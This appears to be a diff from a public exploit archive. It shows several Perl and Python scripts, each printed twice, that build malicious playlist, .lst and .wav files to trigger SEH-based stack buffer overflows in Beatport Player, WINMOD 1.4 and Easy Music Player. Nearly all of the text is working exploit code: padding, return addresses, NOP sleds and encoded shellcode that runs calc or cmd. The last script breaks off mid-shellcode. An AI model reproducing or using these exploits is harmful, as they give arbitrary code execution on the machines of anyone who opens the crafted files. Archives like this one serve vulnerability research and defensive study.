$junk.$next_seh.$seh.$nops.$shellcode.$nopsled.
"\r\n";
close $playlist;
# milw0rm.com [2009-05-01]
#!/usr/bin/perl
# Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH)
# Work Only in WIN SP2 FR
# Credit to SirGod The Discover
# Stack The exploiter
# Whalna rire m3a lprogram mati khdeme hta ti chiyeb lpc :d
# After exec the exploit wait some sec for see the cmd executed :d
use strict;
use warnings;
# win32_exec - EXITFUNC=seh CMD=cmd Size=32 Encoder=Stack http://Sysworm.com =>> http://www.milw0rm.com/exploits/8078
my $shellcode =
"\x8B\xEC\x33\xFF\x57".
"\xC6\x45\xFC\x63\xC6\x45".
"\xFD\x6D\xC6\x45\xFE\x64".
"\xC6\x45\xF8\x01\x8D".
"\x45\xFC\x50\xB8\xC7\x93".
"\xBF\x77\xFF\xD0";
my $junk = "\x41" x 1232;
my $next_seh="\xeb\x06\x90\x90";
my $seh = "\x44\x25\xD1\x72"; #
my $nops = "\x90" x 4;
my $nopsled = "\x90" x 20;
open(my $playlist, "> seh_exploit.m3u");
print $playlist
$junk.$next_seh.$seh.$nops.$shellcode.$nopsled.
"\r\n";
close $playlist;
# milw0rm.com [2009-05-01]

88
platforms/windows/local/9221.pl
View file

@ -1,44 +1,44 @@
#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# WINMOD V 1.4 (.lst File) Local Buffer Overflow Exploit (SEH)
##http://www.software112.com/products/winmod+download.html
# ## easy ##
# Thanks for ELNAMER ELMASRY\EL7ADRANY\DeCo017\ZAX\ASER ELRO7
## this work sooooooooo good
## Tested on: Windows XP Pro SP2 (EN)
##################################################################
my $bof="\x41" x 2880;
my $nsh="\xEB\x06\x90\x90";
my $seh="\x8c\x29\xd3\x74";##EVIL RET
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> HACK4LOVE.LST');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################
# milw0rm.com [2009-07-21]
#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# WINMOD V 1.4 (.lst File) Local Buffer Overflow Exploit (SEH)
##http://www.software112.com/products/winmod+download.html
# ## easy ##
# Thanks for ELNAMER ELMASRY\EL7ADRANY\DeCo017\ZAX\ASER ELRO7
## this work sooooooooo good
## Tested on: Windows XP Pro SP2 (EN)
##################################################################
my $bof="\x41" x 2880;
my $nsh="\xEB\x06\x90\x90";
my $seh="\x8c\x29\xd3\x74";##EVIL RET
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> HACK4LOVE.LST');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################
# milw0rm.com [2009-07-21]

98
platforms/windows/local/9229.py
View file

@ -1,49 +1,49 @@
#!/usr/bin/python
#[*] Exploit : WINMOD 1.4 (.lst) Universal Buffer Overflow Exploit (SEH)
#[*] Tested on : Xp sp2 fr
#[*] Original exploit : http://www.milw0rm.com/exploits/9221
#[*] By : Dz_Girl
#[*] Greets to : hisok4 (even if he doesn't know me) & all friends
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45"
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66"
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f"
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59"
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a"
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44"
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77"
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a"
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b"
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57"
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f"
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73"
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39"
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45"
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45"
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41")
payload = "DZ"
payload += shellcode
payload += "\x41"*(2868-len(shellcode))
payload += "\xE9\xC7\xF4\xFF\xFF"
payload += "\x61"*5
payload += "\xEB\xF4\x41\x41"
payload += "\x1E\x2F\x40\x00"
try:
out_file = open("exploit.lst","w")
out_file.write(payload)
out_file.close()
print("\nExploit file created!\n")
except:
print "Error"
# milw0rm.com [2009-07-22]
#!/usr/bin/python
#[*] Exploit : WINMOD 1.4 (.lst) Universal Buffer Overflow Exploit (SEH)
#[*] Tested on : Xp sp2 fr
#[*] Original exploit : http://www.milw0rm.com/exploits/9221
#[*] By : Dz_Girl
#[*] Greets to : hisok4 (even if he doesn't know me) & all friends
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45"
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66"
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f"
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59"
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a"
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44"
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77"
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a"
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b"
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57"
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f"
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73"
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39"
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45"
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45"
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41")
payload = "DZ"
payload += shellcode
payload += "\x41"*(2868-len(shellcode))
payload += "\xE9\xC7\xF4\xFF\xFF"
payload += "\x61"*5
payload += "\xEB\xF4\x41\x41"
payload += "\x1E\x2F\x40\x00"
try:
out_file = open("exploit.lst","w")
out_file.write(payload)
out_file.close()
print("\nExploit file created!\n")
except:
print "Error"
# milw0rm.com [2009-07-22]

140
platforms/windows/local/9234.pl
View file

@ -1,70 +1,70 @@
#!/usr/bin/perl
#
# Winmod 1.4 (.lst) Local Stack Overflow Exploit
# Exploit by CWH Underground
# Tested on Win XP SP2 EN
#
# Download: http://www.software112.com/products/winmod+download.html
#
print "\n==================================================\n";
print " Winmod 1.4 (.lst) Local Stack Overflow Exploit \n";
print " \n";
print " Discovered By CWH Underground \n";
print "==================================================\n";
print " \n";
print " ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
print " \n";
## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41".
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41".
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59".
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c".
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45".
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66".
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f".
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59".
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a".
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44".
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77".
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a".
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b".
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57".
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f".
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73".
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39".
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45".
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45".
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41";
my $buf="\x41" x 500;
$buf = $buf."\x68\xD5\x85\x7C";
$buf = $buf.("\x90" x 12);
$buf = $buf.$shellcode;
$buf = $buf."\x2E".("\x41"x9);
open(FILE,'>cwh_xpl.lst') or die ("[+] Error: cannot open destination file\n");
print FILE $buf;
close (FILE);
print "[+] Create exploit file successful\n";
print "[+] File's name is cwh_xpl.lst\n";
#####################################################################
#Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################
# milw0rm.com [2009-07-23]
#!/usr/bin/perl
#
# Winmod 1.4 (.lst) Local Stack Overflow Exploit
# Exploit by CWH Underground
# Tested on Win XP SP2 EN
#
# Download: http://www.software112.com/products/winmod+download.html
#
print "\n==================================================\n";
print " Winmod 1.4 (.lst) Local Stack Overflow Exploit \n";
print " \n";
print " Discovered By CWH Underground \n";
print "==================================================\n";
print " \n";
print " ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
print " \n";
## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41".
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41".
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59".
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c".
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45".
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66".
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f".
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59".
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a".
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44".
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77".
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a".
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b".
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57".
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f".
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73".
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39".
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45".
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45".
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41";
my $buf="\x41" x 500;
$buf = $buf."\x68\xD5\x85\x7C";
$buf = $buf.("\x90" x 12);
$buf = $buf.$shellcode;
$buf = $buf."\x2E".("\x41"x9);
open(FILE,'>cwh_xpl.lst') or die ("[+] Error: cannot open destination file\n");
print FILE $buf;
close (FILE);
print "[+] Create exploit file successful\n";
print "[+] File's name is cwh_xpl.lst\n";
#####################################################################
#Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################
# milw0rm.com [2009-07-23]

106
platforms/windows/local/9299.pl
View file

@ -1,53 +1,53 @@
#
# Winmod 1.4 (.lst) Local Stack Overflow Exploit (RET overwrite+SEH)
# http://www.software112.com/products/winmod+download.html
#
# Exploit for Windows XP SP3 (en)
#
# by corelan - c0d3r
# Greetings to Saumil and SK
#
my $sploitfile = "c:\\program files\\winmod\\xpl_sp3.lst";
my $buf="\x41" x 500;
$buf=$buf.pack('V',0x76B2D577);
$buf=$buf."\x41" x (2880-500);
my $nseh = "\xEB\x06\x90\x90";
my $seh=pack('V',0x7C972ECD);
my $nop = "\x90" x 20;
## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41".
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41".
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59".
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c".
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45".
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66".
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f".
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59".
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a".
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44".
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77".
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a".
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b".
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57".
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f".
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73".
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39".
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45".
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45".
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41";
$buf = $buf.$nseh.$seh.$nop.$shellcode;
print "[+] Writing exploit file \n";
open(FILE,'>$sploitfile');
print FILE $buf;
close (FILE);
print "[+] Exploit file written : $sploitfile\n";
print "[+] File's name is xpl_sp3.lst\n";
# milw0rm.com [2009-07-28]
#
# Winmod 1.4 (.lst) Local Stack Overflow Exploit (RET overwrite+SEH)
# http://www.software112.com/products/winmod+download.html
#
# Exploit for Windows XP SP3 (en)
#
# by corelan - c0d3r
# Greetings to Saumil and SK
#
my $sploitfile = "c:\\program files\\winmod\\xpl_sp3.lst";
my $buf="\x41" x 500;
$buf=$buf.pack('V',0x76B2D577);
$buf=$buf."\x41" x (2880-500);
my $nseh = "\xEB\x06\x90\x90";
my $seh=pack('V',0x7C972ECD);
my $nop = "\x90" x 20;
## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41".
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41".
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59".
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c".
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45".
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66".
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f".
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59".
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a".
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44".
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77".
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a".
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b".
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57".
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f".
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73".
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39".
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45".
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45".
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41";
$buf = $buf.$nseh.$seh.$nop.$shellcode;
print "[+] Writing exploit file \n";
open(FILE,'>$sploitfile');
print FILE $buf;
close (FILE);
print "[+] Exploit file written : $sploitfile\n";
print "[+] File's name is xpl_sp3.lst\n";
# milw0rm.com [2009-07-28]

78
platforms/windows/local/9412.pl
View file

@ -1,39 +1,39 @@
#!/usr/bin/perl
# by ahwak2000
# email: 0.w[at]w.cn
# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)
# http://www.otbcode.com/downloads/easymusicsetup.exe
###################################################################
my $shellcode=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
